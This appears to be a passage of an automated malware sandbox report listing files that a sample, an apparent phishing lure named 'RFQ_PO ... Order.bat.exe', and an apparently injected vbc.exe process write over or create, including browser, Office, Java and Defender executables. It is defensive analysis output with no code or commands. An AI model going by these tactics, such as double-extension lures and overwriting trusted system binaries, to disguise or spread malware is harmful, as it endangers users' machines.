                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\AgentService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | System file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\vds.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\snmptrap.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeFile created: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
